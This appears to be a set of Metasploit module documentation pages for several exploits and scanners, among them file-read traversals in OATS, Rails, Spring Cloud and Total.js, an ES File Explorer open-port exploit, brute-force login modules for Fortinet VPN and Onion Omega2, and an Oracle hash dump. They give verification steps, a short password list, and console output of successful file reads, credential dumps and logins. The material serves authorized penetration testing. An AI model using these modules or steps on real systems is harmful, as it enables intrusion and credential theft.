Oracle Application Testing Suite (OATS) is a comprehensive, integrated testing solution for web applications, web services, packaged Oracle applications, and Oracle databases. OATS is part of an application deployed in the WebLogic service on port 8088, which also includes these tools: Administrator, OpenScript, Oracle Load Testing, and Oracle Test Manager.
In the Load Testing component, a vulnerability was discovered by Steven Seeley (@mr_me) of Source Incite in the DownloadServlet class. According to the Source Incite advisory, the issue results from the lack of proper validation of a user-supplied string before using it to read a file. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Note that authentication is required.
This vulnerability is also known as CVE-2019-2557.
## Vulnerable Application
The following is the exact setup I used to test and analyze the vulnerability:
- Windows Server 2008 R2 x64 (other Windows systems are also supported)
- .Net Framework 3.5 enabled (from add/remove features)
- IE ESC (from Server Manager) disabled
- 8GB of RAM (at least more than 4GB will be used to run OATS)
- Duel-Core processor
- oats-win64-full-13.3.0.1.262.zip (x86 did not work for me)
- Jdk-7u21-windows-x64.exe
- OracleXE112_Win64.zip (Newer version 18c did not work well for me)
- Firefox (I had to install this because IE on Win2k8 is completely outdated)
- Adobe Flash installed (IE ESC needs to be disabled in order to install this)
For installation instructions, please refer to the Oracle Application Testing Suite Installation Guide.
## Notes
By default, your starting traversal path is:
```
C:\OracleATS\config\Report Templates\
```
There are some interesting files you can steal from this directory, such as:
* oats-config.xml
* oats-database-config.xml
* oats-keystore
Code execution is possible leveraging from this vulnerability if you target these files:
* C:\OracleATS\oats\servers\AdminServer\security\SerializedSystemIni.dat
* C:\OracleATS\oats\servers\AdminServer\security\boot.properties
After that, you can find a third party script to decrypt the credentials, and then you could
gain code execution from the administrator console.
## Credit
Special thanks to Steven Seeley to assist on the development of the Metasploit module.
## Scenarios
```
msf5 auxiliary(gather/oats_downloadservlet_traversal) > run
[*] Running module against 172.16.249.143
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<entry key="oracle.oats.cluster.agent.username">oats-agent</entry>
<entry key="oracle.oats.security.keystore.info">eYAdfLaDkdBlUmflYhpg+CHGeXc=</entry>
<entry key="oracle.oats.cluster.username">oats</entry>
<entry key="oracle.oats.cluster.agent.password">{AES}WNdIPXpoeoZzyDNuJPm0wU4R3YKc1SUR2k5+TbQfzIQ=</entry>
<entry key="oracle.oats.admin.username">oats</entry>
<entry key="oracle.oats.http.url">http://localhost:8088</entry>
<entry key="oracle.oats.config.version">9.1.0</entry>
<entry key="oracle.oats.admin.password">{AES}NHrwlbPc7Arlb7puj+UlzAAXB/dUEbv3bdwNnee1/sc=</entry>
<entry key="oracle.oats.cluster.password">{AES}WMTjMmLChdB9CTSrnyJ33113u0ml0juuGZQCWPODJTk=</entry>
<entry key="oracle.oats.admin.url">t3://localhost:8088</entry>
<entry key="oracle.oats.tmp.dir">/tmp</entry>
<entry key="oracle.oats.cluster.url">t3://localhost:8088</entry>
</properties>
[*] Auxiliary module execution completed
msf5 auxiliary(gather/oats_downloadservlet_traversal) >
```
@@ -0,0 +1,76 @@
## Vulnerable Application
Ruby on Rails versions <= 5.2.2. The following example shows how to recreate the vulnerable environment on Linux:
https://chybeta.github.io/2019/03/16/Analysis-for%E3%80%90CVE-2019-5418%E3%80%91File-Content-Disclosure-on-Rails/
## Verification Steps
1. Start a Rails server using a vulnerable version
2. Start msfconsole
3. Do: ```use auxiliary/gather/rails_doubletap_file_read```
4. Do: ```set ROUTE /your_route```
5. Do: ```set RHOSTS target```
6. Do: ```set TARGET_FILE /absolute/path/to/remote/file.txt```
7. Do: ```run```
8. If everything goes smoothly, you should get the contents of the remote file printed to the console.
## Options
**ROUTE**
This is a web path or "route" on the vulnerable server. Since the vulnerability lies within the PathResolver of Rails, the route should be in the server's routes.rb file.
**TARGET_FILE**
This is the file to be read on the remote server. This *must* be an absolute path (eg. /etc/passwd).
## Advanced Options
**SKIP_CHECK**
This options skips the initial vulnerability check and continues thinking the server is vulnerable.
## Scenarios
### Version of software and OS as applicable
```
msf5 > use auxiliary/gather/rails_doubletap_file_read
msf5 auxiliary(gather/rails_doubletap_file_read) > options
Module options (auxiliary/gather/rails_doubletap_file_read):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
ROUTE /msf yes A route on the vulnerable server.
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGET_FILE /etc/passwd yes The absolute path of remote file to read.
VHOST no HTTP server virtual host
msf5 auxiliary(gather/rails_doubletap_file_read) > set RHOSTS localhost
RHOSTS => localhost
msf5 auxiliary(gather/rails_doubletap_file_read) > set RPORT 8000
RPORT => 8000
smsf5 auxiliary(gather/rails_doubletap_file_read) > set ROUTE /demo
ROUTE => /demo
msf5 auxiliary(gather/rails_doubletap_file_read) > run
[*] Running module against 127.0.0.1
[+] Target is vulnerable!
[*] Requesting file /etc/passwd
[+] Response from server:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...snip...
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
postgres:x:105:112:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[*] Auxiliary module execution completed
```
@@ -0,0 +1,28 @@
This module provides a port of Daniel Mende's (released under the BSD license) gtp-scan.py utility. It brings the ability to scan for GPRS servers to Metasploit via sending GTP-U v1 and v2 echo requests.
## Vulnerable Application
Open-source GGSN implementations can be used as a target for this module as well as commercial GPRS gear. For information on one project suitable as a target, see [OsmoGGSN](https://osmocom.org/projects/openggsn/wiki/OsmoGGSN).
## Options
**The RPORT option**
This option can be changed to target GTP-U (2152) or GTP-C (2123), which both use the same packet type for echo probing.
## Scenarios
```
metasploit-framework (S:0 J:1) auxiliary(scanner/gprs/gtp_echo) > set RHOSTS 192.168.28.200-192.168.28.208
RHOSTS => 192.168.28.200-192.168.28.208
metasploit-framework (S:0 J:1) auxiliary(scanner/gprs/gtp_echo) > run
[*] [2019.04.22-16:38:27] Sending probes to 192.168.28.200->192.168.28.208 (9 hosts)
[+] [2019.04.22-16:38:42] GTP v1 echo response received from: 192.168.28.200:2152
[+] [2019.04.22-16:38:43] GTP v1 echo response received from: 192.168.28.201:2152
[+] [2019.04.22-16:38:43] GTP v1 echo response received from: 192.168.28.207:2152
[+] [2019.04.22-16:38:43] GTP v1 echo response received from: 192.168.28.208:2152
[*] [2019.04.22-16:38:43] Scanned 9 of 9 hosts (100% complete)
[*] Auxiliary module execution completed
metasploit-framework (S:0 J:1) auxiliary(scanner/gprs/gtp_echo) >
```
@@ -0,0 +1,263 @@
## Vulnerable Application
ES File Explorer has an HTTP server that runs and accepts
certain commands. The HTTP server is started on app launch, and is
available as long as the app is open. ES File Explorer launches as
a service in the background on device boot. Version 4.1.9.7.4 and below
are reported vulnerable. This module has been tested against
[4.1.9.5.1](https://www.apkmirror.com/apk/es-global/es-file-explorer/es-file-explorer-4-1-9-5-1-release/).
This module includes all functionality from the original [POC](https://github.com/fs0c131y/ESFileExplorerOpenPortVuln)
except for the `getAppThumbnail` command.
Available actions:
* **APPLAUNCH** Launch an app. ACTIONITEM required.
* **GETDEVICEINFO** Get device info
* **GETFILE** Get a file from the device. ACTIONITEM required.
* **LISTAPPS** List all the apps installed
* **LISTAPPSALL** List all the apps installed
* **LISTAPPSPHONE** List all the phone apps installed
* **LISTAPPSSDCARD** List all the apk files stored on the sdcard
* **LISTAPPSSYSTEM** List all the system apps installed
* **LISTAUDIOS** List all the audio files
* **LISTFILES** List all the files on the sdcard
* **LISTPICS** List all the pictures
* **LISTVIDEOS** List all the videos
Not all of the information from the commands is printed to screen, however the origin JSON
content is stored in loot for reference.
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: ```use modules/auxiliary/scanner/http/es_file_explorer_open_port```
4. Do: ```run```
5. You should get device information
## Options
**ACTION**
The action to perform. See description in Vulnerable Application section for additional details. Default is `GETDEVICEINFO`.
**ACTIONITEM**
If running `APPLAUNCH` or `GETFILE`, this is the app to launch or file to download.
## Scenarios
### ES File Explorer 4.1.9.5.1 on a Dragon Touch Y88X on Android 4.4
```
resource (es.rb)> use modules/auxiliary/scanner/http/es_file_explorer_open_port
resource (es.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (es.rb)> set action GETDEVICEINFO
action => GETDEVICEINFO
resource (es.rb)> run
[+] 1.1.1.1:59777 - Name: Y88X
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTFILES
action => LISTFILES
resource (es.rb)> run
[+] 1.1.1.1:59777
folder: bootloader (0.00 Bytes) - 3/23/2019 10:36:51 AM
folder: databk (0.00 Bytes) - 3/23/2019 10:36:49 AM
folder: sdcard (4.00 KB) - 3/23/2019 02:15:24 PM
folder: storage (0.00 Bytes) - 3/23/2019 10:36:49 AM
folder: config (0.00 Bytes) - 3/23/2019 10:36:49 AM
folder: cache (4.00 KB) - 3/24/2019 07:37:46 AM
folder: acct (0.00 Bytes) - 3/23/2019 10:36:49 AM
folder: vendor (4.00 KB) - 1/31/2015 05:56:49 AM
folder: d (0.00 Bytes) - 12/31/1969 07:00:00 PM
folder: etc (4.00 KB) - 2/3/2015 03:51:06 AM
folder: mnt (0.00 Bytes) - 3/23/2019 10:36:49 AM
file: ueventd.sun8i.rc (1.18 KB) - 12/31/1969 07:00:00 PM
file: ueventd.rc (3.93 KB) - 12/31/1969 07:00:00 PM
folder: system (4.00 KB) - 12/31/1969 07:00:00 PM
folder: sys (0.00 Bytes) - 3/23/2019 10:36:45 AM
file: sepolicy (73.82 KB) - 12/31/1969 07:00:00 PM
file: seapp_contexts (656.00 Bytes) - 12/31/1969 07:00:00 PM
folder: sbin (0.00 Bytes) - 12/31/1969 07:00:00 PM
folder: res (0.00 Bytes) - 12/31/1969 07:00:00 PM
file: property_contexts (2.11 KB) - 12/31/1969 07:00:00 PM
folder: proc (0.00 Bytes) - 12/31/1969 07:00:00 PM
file: nand.ko (1.47 MB) - 12/31/1969 07:00:00 PM
file: initlogo.rle (2.34 MB) - 12/31/1969 07:00:00 PM
file: init.usb.rc (3.82 KB) - 12/31/1969 07:00:00 PM
file: init.trace.rc (1.75 KB) - 12/31/1969 07:00:00 PM
file: init.sunxi.wifi.bt.rc (1010.00 Bytes) - 12/31/1969 07:00:00 PM
file: init.sun8i.usb.rc (3.40 KB) - 12/31/1969 07:00:00 PM
file: init.sun8i.rc (4.67 KB) - 12/31/1969 07:00:00 PM
file: init.recovery.sun8i.rc (97.00 Bytes) - 12/31/1969 07:00:00 PM
file: init.rc (23.12 KB) - 12/31/1969 07:00:00 PM
file: init.environ.rc (919.00 Bytes) - 12/31/1969 07:00:00 PM
file: init (183.40 KB) - 12/31/1969 07:00:00 PM
file: fstab.sun8i (1.64 KB) - 12/31/1969 07:00:00 PM
file: file_contexts (9.03 KB) - 12/31/1969 07:00:00 PM
file: default.prop (116.00 Bytes) - 12/31/1969 07:00:00 PM
folder: data (4.00 KB) - 3/23/2019 10:36:52 AM
file: charger (274.11 KB) - 12/31/1969 07:00:00 PM
folder: root (0.00 Bytes) - 1/31/2015 05:24:35 AM
folder: dev (2.62 KB) - 3/23/2019 10:37:14 AM
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTVIDEOS
action => LISTVIDEOS
resource (es.rb)> run
[+] 1.1.1.1:59777
DragonTouch-text.mp4 (55.30 MB) - 1/20/1970 10:18:53 PM: /storage/emulated/0/Movies/DragonTouch-text.mp4
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTAUDIOS
action => LISTAUDIOS
resource (es.rb)> run
[+] 1.1.1.1:59777
Calendar Notification.ogg (52.89 KB) - 8/6/2015 08:15:30 PM: /storage/emulated/0/Notifications/Calendar Notification.ogg
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTAPPSSYSTEM
action => LISTAPPSSYSTEM
resource (es.rb)> run
[+] 1.1.1.1:59777
Package Access Helper (com.android.defcontainer) Version: 4.4.2-20150203
Launcher (com.android.launcher) Version: 4.4.2-20150203
Contacts (com.android.contacts) Version: 4.4.2-20150203
com.android.providers.partnerbookmarks (com.android.providers.partnerbookmarks) Version: 4.4.2-20150203
```
...snip...
```
Chrome (com.android.chrome) Version: 67.0.3396.87
Shell (com.android.shell) Version: 4.4.2-20150203
Google Contacts Sync (com.google.android.syncadapters.contacts) Version: 4.4.2-940549
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTAPPSPHONE
action => LISTAPPSPHONE
resource (es.rb)> run
[+] 1.1.1.1:59777
Package Access Helper (com.android.defcontainer) Version: 4.4.2-20150203
Launcher (com.android.launcher) Version: 4.4.2-20150203
Contacts (com.android.contacts) Version: 4.4.2-20150203
com.android.providers.partnerbookmarks (com.android.providers.partnerbookmarks) Version: 4.4.2-20150203
Mobile Data (com.android.phone) Version: 4.4.2-20150203
Calculator (com.android.calculator2) Version: 4.4.2-20150203
```
...snip...
```
Calendar (com.google.android.calendar) Version: 5.8.28-195646716-release
Face Unlock (com.android.facelock) Version: 4.4.2-940549
Chrome (com.android.chrome) Version: 67.0.3396.87
Shell (com.android.shell) Version: 4.4.2-20150203
Google Contacts Sync (com.google.android.syncadapters.contacts) Version: 4.4.2-940549
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTAPPSSDCARD
action => LISTAPPSSDCARD
resource (es.rb)> run
[+] 1.1.1.1:59777
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTAPPSALL
action => LISTAPPSALL
resource (es.rb)> run
[+] 1.1.1.1:59777
Package Access Helper (com.android.defcontainer) Version: 4.4.2-20150203
Launcher (com.android.launcher) Version: 4.4.2-20150203
Contacts (com.android.contacts) Version: 4.4.2-20150203
```
...snip...
```
com.android.keyguard (com.android.keyguard) Version: 4.4.2-20150203
Calendar (com.google.android.calendar) Version: 5.8.28-195646716-release
Face Unlock (com.android.facelock) Version: 4.4.2-940549
Chrome (com.android.chrome) Version: 67.0.3396.87
Shell (com.android.shell) Version: 4.4.2-20150203
Google Contacts Sync (com.google.android.syncadapters.contacts) Version: 4.4.2-940549
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTPICS
action => LISTPICS
resource (es.rb)> run
[+] 1.1.1.1:59777
IMG_20190323_165608.jpg (140.06 KB) - 3/23/2019 04:56:08 PM: /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action GETFILE
action => GETFILE
resource (es.rb)> set actionitem /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg
actionitem => /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg
resource (es.rb)> run
[+] 1.1.1.1:59777 - /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg saved to /root/.msf4/loot/20190324073855_default_1.1.1.1_getFile_670725.jpg
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTAPPS
action => LISTAPPS
resource (es.rb)> run
[+] 1.1.1.1:59777
TalkBack (com.google.android.marvin.talkback) Version: 5.0.7
Google Play services (com.google.android.gms) Version: 12.6.85 (000302-197041431)
Phone (com.andriod.phone) Version: 1.0
Google Play Music (com.google.android.music) Version: 8.12.7210-1.F
Google Text-to-speech Engine (com.google.android.tts) Version: 3.15.18.200023596
Cloud Print (com.google.android.apps.cloudprint) Version: 1.40
com.softwinner.videotest (com.softwinner.videotest) Version: 1.0
APUS (com.apusapps.launcher) Version: 2.3.1
Settings (com.android.system.io.settings) Version: 11.1.0
DragonPhone (com.softwinner.dragonphone) Version: 1.0
com.mediatek.touch (com.mediatek.touch) Version: 21_zh80001
Google Play Store (com.android.vending) Version: 13.9.17-all [0] [PR] 236777123
com.android.google.settings (com.android.google.settings) Version: 17_zh10317
MainActivity (com.metasploit.stage) Version: 1.0
Gmail (com.google.android.gm) Version: 8.6.3.200445973.release
L-Uninstall (com.clear.uninstall) Version: 2.0
ES File Explorer (com.estrongs.android.pop) Version: 4.1.9.5.1
DragonFire-v2.3 (com.softwinner.dragonfire) Version: 2.3 release
YouTube (com.google.android.youtube) Version: 13.23.59
Calendar (com.google.android.calendar) Version: 5.8.28-195646716-release
Chrome (com.android.chrome) Version: 67.0.3396.87
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action APPLAUNCH
action => APPLAUNCH
resource (es.rb)> set actionitem com.android.chrome
actionitem => com.android.chrome
resource (es.rb)> run
[+] 1.1.1.1:59777 - com.android.chrome launched successfully
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
1.1.1.1 getDeviceInfo.json es_file_explorer_getdeviceinfo.json application/json /root/.msf4/loot/20190324073803_default_1.1.1.1_getDeviceInfo.js_744272.bin
1.1.1.1 listFiles.json es_file_explorer_listfiles.json application/json /root/.msf4/loot/20190324073803_default_1.1.1.1_listFiles.json_522563.bin
1.1.1.1 listVideos.json es_file_explorer_listvideos.json application/json /root/.msf4/loot/20190324073803_default_1.1.1.1_listVideos.json_623335.bin
1.1.1.1 listAudio.json es_file_explorer_listaudio.json application/json /root/.msf4/loot/20190324073803_default_1.1.1.1_listAudio.json_331531.bin
1.1.1.1 listAppsSystem.json es_file_explorer_listappssystem.json application/json /root/.msf4/loot/20190324073821_default_1.1.1.1_listAppsSystem.j_581712.bin
1.1.1.1 listAppsPhone.json es_file_explorer_listappsphone.json application/json /root/.msf4/loot/20190324073838_default_1.1.1.1_listAppsPhone.js_773512.bin
1.1.1.1 listAppsSdcard.json es_file_explorer_listappssdcard.json application/json /root/.msf4/loot/20190324073838_default_1.1.1.1_listAppsSdcard.j_543396.bin
1.1.1.1 listAppsAll.json es_file_explorer_listappsall.json application/json /root/.msf4/loot/20190324073854_default_1.1.1.1_listAppsAll.json_886297.bin
1.1.1.1 listPics.json es_file_explorer_listpics.json application/json /root/.msf4/loot/20190324073855_default_1.1.1.1_listPics.json_831055.bin
1.1.1.1 getFile /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg application/octet-stream /root/.msf4/loot/20190324073855_default_1.1.1.1_getFile_670725.jpg
1.1.1.1 listApps.json es_file_explorer_listapps.json application/json /root/.msf4/loot/20190324073856_default_1.1.1.1_listApps.json_189709.bin
```
@@ -0,0 +1,40 @@
This module tests credentials on Fortinet SSL VPN servers (FortiGate).
NOTE: This module is only executing when Fortinet SSL VPN Server is detected.
When the server cannot be verified the module stops working.
The realm/domain is used for every request when set.
The module supports IPv6 requests.
The module supports several hosts at the same time.
## Verification Steps
1. Do: ```use auxiliary/scanner/http/fortinet_ssl_vpn```
2. Do: ```set RHOSTS [IP]```
3. Configure a user and password list by setting either `USERNAME`, `PASSWORD`, `USER_FILE`, or `PASS_FILE`.
4. Do: ```run```
## Scenarios
IP-Addresses have been masked with x
```
msf5 auxiliary(scanner/http/fortinet_ssl_vpn) > run
[+] xxxx:xxxx:xxxx:xxxx::4:443 - Server is responsive...
[+] xxxx:xxxx:xxxx:xxxx::4:443 - Application appears to be Fortinet SSL VPN. Module will continue.
[*] xxxx:xxxx:xxxx:xxxx::4:443 - Starting login brute force...
[*] xxxx:xxxx:xxxx:xxxx::4:443 - [1/1] - Trying username:"testuser" with password:"superpass"
[+] SUCCESSFUL LOGIN - "testuser":"superpass"
[!] No active DB -- Credential data will not be saved!
[*] Scanned 1 of 2 hosts (50% complete)
[+] xxx.xxx.xxx.xxx:443 - [1/1] - Server is responsive...
[+] xxx.xxx.xxx.xxx:443 - [1/1] - Application appears to be Fortinet SSL VPN. Module will continue.
[*] xxx.xxx.xxx.xxx:443 - [1/1] - Starting login brute force...
[*] xxx.xxx.xxx.xxx:443 - [1/1] - Trying username:"testuser" with password:"superpass"
[+] SUCCESSFUL LOGIN - "testuser":"superpass"
[!] No active DB -- Credential data will not be saved!
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
```
@@ -0,0 +1,72 @@
## Description
The onion_omega2_login module is used to brute-force credentials for Onion Omage2 devices.
## Vulnerable Application
* Onion Omage2 HTTPd Service
![Onion Omega2](https://raw.githubusercontent.com/OnionIoT/Onion-Docs/master/Omega2/Documentation/Get-Started/img/unbox-6-omega-led-detail.jpg)
![Onion Omega2 OnionOS Web Page](https://i.imgur.com/nrHnQaW.png)
## Verification Steps
1. Plug your Onion Omega2 device to a power source.
- First time setup can be found [here](https://docs.onion.io/omega2-docs/first-time-setup.html)
2. Connect to its Wi-Fi network.
3. Start `msfconsole`
4. Do: `use auxiliary/scanner/http/onion_omega2_login`
5. Do: `set RHOSTS 192.168.3.1`
6. Do: `set USERPASS_FILE <user pass dictionary>`
- username and password seperated by space and one pair per line.
7. Do: `run`
Sample userpass file:
```text
root 123456
root password
root 123456789
root 12345678
root 12345
root 10601
root qwerty
root 123123
root 111111
root abc123
root 1234567
root dragon
root 1q2w3e4r
root sunshine
root 654321
root master
```
## Scenario
```
msf5 > use auxiliary/scanner/http/onion_omega2_login
msf5 auxiliary(scanner/http/onion_omega2_login) > set RHOSTS 192.168.3.1
RHOSTS => 192.168.3.1
msf5 auxiliary(scanner/http/onion_omega2_login) > set USERPASS_FILE something.txt
USERPASS_FILE => something.txt
msf5 auxiliary(scanner/http/onion_omega2_login) > run
[*] Running for 192.168.3.1...
[*] 192.168.3.1:80 - [ 1/16] - root:123456 - Failure
[!] No active DB -- Credential data will not be saved!
[*] 192.168.3.1:80 - [ 2/16] - root:password - Failure
[*] 192.168.3.1:80 - [ 3/16] - root:123456789 - Failure
[*] 192.168.3.1:80 - [ 4/16] - root:12345678 - Failure
[*] 192.168.3.1:80 - [ 5/16] - root:12345 - Failure
[+] Ubus RPC Session: 403e133730879d23a2a0df022e19c19c
[+] 192.168.3.1:80 - [ 6/16] - root:10601 - Success
[*] 192.168.3.1:80 - [ 7/16] - root:qwerty - Failure
[*] 192.168.3.1:80 - [ 8/16] - root:123123 - Failure
[*] 192.168.3.1:80 - [ 9/16] - root:111111 - Failure
[*] 192.168.3.1:80 - [10/16] - root:abc123 - Failure
[*] 192.168.3.1:80 - [11/16] - root:1234567 - Failure
[*] 192.168.3.1:80 - [12/16] - root:dragon - Failure
[*] 192.168.3.1:80 - [13/16] - root:1q2w3e4r - Failure
[*] 192.168.3.1:80 - [14/16] - root:sunshine - Failure
[*] 192.168.3.1:80 - [15/16] - root:654321 - Failure
[*] 192.168.3.1:80 - [16/16] - root:master - Failure
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
@@ -0,0 +1,35 @@
## Description
This module exploits an unauthenticated directory traversal vulnerability, which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6.
Spring Cloud Config listens by default on port 8888.
### Vulnerable Application
* https://github.com/spring-cloud/spring-cloud-config/archive/v2.1.1.RELEASE.zip
## Verification
1. `./msfconsole`
2. `use auxiliary/scanner/http/springcloud_traversal`
3. `set rhosts <rhost>`
4. `run`
## Scenarios
### Tested against Linux zero 4.15.0-48-generic #51-Ubuntu SMP x86_64 GNU/Linux
```
msf > use auxiliary/scanner/http/springcloud_traversal
msf auxiliary(scanner/http/springcloud_traversal) > set RHOSTS 192.168.1.132
RHOSTS => 192.168.1.132
msf auxiliary(scanner/http/springcloud_traversal) > run
[+] File saved in: /home/input0/.msf4/loot/20190418203756_default_192.168.1.132_springcloud.trav_893434.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/springcloud_traversal) >
```
## References
* https://pivotal.io/security/cve-2019-3799
@@ -0,0 +1,60 @@
## Description
This module check and exploits a Directory Traversal vulnerability in Total.js framework < 3.2.4 (CVE-2019-8903). Here is a list of accepted extensions: flac, jpg, jpeg, png, gif, ico, js, css, txt, xml, woff, woff2, otf, ttf, eot, svg, zip, rar, pdf, docx, xlsx, doc, xls, html, htm, appcache, manifest, map, ogv, ogg, mp4, mp3, webp, webm, swf, package, json, md, m4v, jsx, heif, heic.
## Vulnerable Application
Affecting total.js package, versions:
* >=2.1.0 <2.1.1
* >=2.2.0 <2.2.1
* >=2.3.0 <2.3.1
* >=2.4.0 <2.4.1
* >=2.5.0 <2.5.1
* >=2.6.0 <2.6.3
* >=2.7.0 <2.7.1
* >=2.8.0 <2.8.1
* >=2.9.0 <2.9.5
* >=3.0.0 <3.0.1
* >=3.1.0 <3.1.1
* >=3.2.0 <3.2.4
## Verification Steps
1. On a Node v8 environment do: `npm install total.js@3.2.3`
2. Install an app on top of the Total.js framework, something like [Total.js CMS](https://github.com/totaljs/cms)
* `git clone https://github.com/totaljs/cms.git`
* `cd cms && npm install`
3. Start `msfconsole`
4. `use auxiliary/scanner/http/totaljs_traversal`
5. `set RHOST <IP>`
6. `set RPORT <PORT>`
7. `run`
8. Verify you get Total.js version if the target is vulnerable!
## Options
* **TARGETURI**: Path to Total.js App installation (“/” is the default)
* **DEPTH**: Traversal depth (“1” is the default)
* **FILE**: File to obtain (“databases/settings.json” is the default for Total.js CMS App)
## Scenario
### Tested on Total.js framework 3.2.0 and Total.js CMS 12.0.0
```
msf5 > use auxiliary/scanner/http/totaljs_traversal
msf5 auxiliary(scanner/http/totaljs_traversal) > set RHOST 192.168.2.59
RHOST => 192.168.2.59
msf5 auxiliary(scanner/http/totaljs_traversal) > set RPORT 8320
RPORT => 8320
msf5 auxiliary(scanner/http/totaljs_traversal) > run
[*] Running module against 192.168.2.59
[*] Total.js version is: ^3.2.0
[*] App name: CMS
[*] App description: A simple and powerful CMS solution written in Total.js / Node.js.
[*] App version: 12.0.0
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/totaljs_traversal) >
```
@@ -0,0 +1,173 @@
## Preparation: 6 steps
1. Oracle DB XE (Express Edition) can be downloaded for free [here](https://www.oracle.com/technetwork/database/database-technologies/express-edition/downloads/index.html).
2. Install Oracle Database and create a database. Versions 8i through 12c are supported.
3. On your Oracle DB machine, make sure you can ping the DB server using the `tnsping [SID]` command. If `tnsping` is not in your path upon installation, you will have to locate it manually.
* On a Windows machine, for Oracle 11g, `tnsping.exe` is located at: `oracle_install\app\oracle\product\<version, ie 11.2.0)\server\bin\tnsping.exe`.
* On a Windows machine, for Oracle 12c and 18c, it is located at `%ORACLE_HOME%\bin\tnsping.exe`.
After this command is run, if all is well, the output will look something like this (note the OK echoed at the end):
```
C:> tnsping staticdb
...
Used TNSNAMES adapter to resolve the alias
Attempting to contact (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = localhost)(PORT = 1521)) (CONNECT_DATA = (SERVER = DEDICATED) (SERVICE_NAME = staticdb)))
OK (0 msec)
```
If `tnsping` fails, make sure the listener is setup correctly.
See [this Oracle doc](https://docs.oracle.com/cd/E11882_01/network.112/e41945/listenercfg.htm#NETAG294) for more information about its configuration.
4. Make sure to create a user on the DB that has a known password, and sufficient privileges to select any table. This is necessary for getting the hashes.
5. Test that the module's hash query works locally. Once your user is created with sufficient privileges, connect to the DB as the user, and proceed to run the following query
* 12c: `SELECT name, spare4 FROM sys.user$ where password is not null and name <> \'ANONYMOUS\'`
* pre-12c: `SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\'`
6. Set up your MSF environment to support Oracle. You need gem ruby-oci8, as well as Oracle Instant Client.
[View the setup tutorial here](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux)
7. Make sure you have a database connected to MSF (postgresql). This can be done through `msfdb` tool or through `db_connect` command in `msfconsole`.
## Verification Steps
1. Start `msfconsole`
2. Do: ```use auxiliary/scanner/oracle/oracle_hashdump.rb```
3. Do: ```run```
4. If Oracle DB version is supported, the query will be attempted to get the hashes. Hash table is built and then saved as credentials.
5. You may view saved credentials with `creds` command. These are used for cracking by module `jtr_oracle_fast`.
## Options
**DBPASS**
The password to authenticate with. Change this from TIGER to the password of the privileged user created in step 4 of Preparation.
**DBUSER**
The username to authenticate with. Change this from SCOTT to the user you created who is granted privileges to select from the sys.user$ table
**RPORT**
The TNS port of the Oracle DB server. By default, Oracle uses port 1521. Double-check the port of your Oracle DB.
**SID**
The Service ID (of the database) to authenticate with. Change this to your SID (if you changed the SID from default upon installation).
Default is `ORCL` (default Oracle install value) or `XE` for free edition.
## Scenarios
### Running Oracle 12c on a local Windows 10 machine, and MSF5 on Ubuntu for Windows (same machine)
```
msf5 auxiliary(scanner/oracle/oracle_hashdump) > show options
Module options (auxiliary/scanner/oracle/oracle_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
DBPASS hunter2 yes The password to authenticate with.
DBUSER scott yes The username to authenticate with.
RHOST 127.0.0.1 yes The Oracle host.
RHOSTS 127.0.0.1 yes The target address range or CIDR identifier
RPORT 1522 yes The TNS port.
SID staticdb yes The sid to authenticate with.
THREADS 1 yes The number of concurrent threads
msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
[*] Server is running 12c
[*] Hash table :
Oracle Server Hashes
====================
Username Hash
-------- ----
...
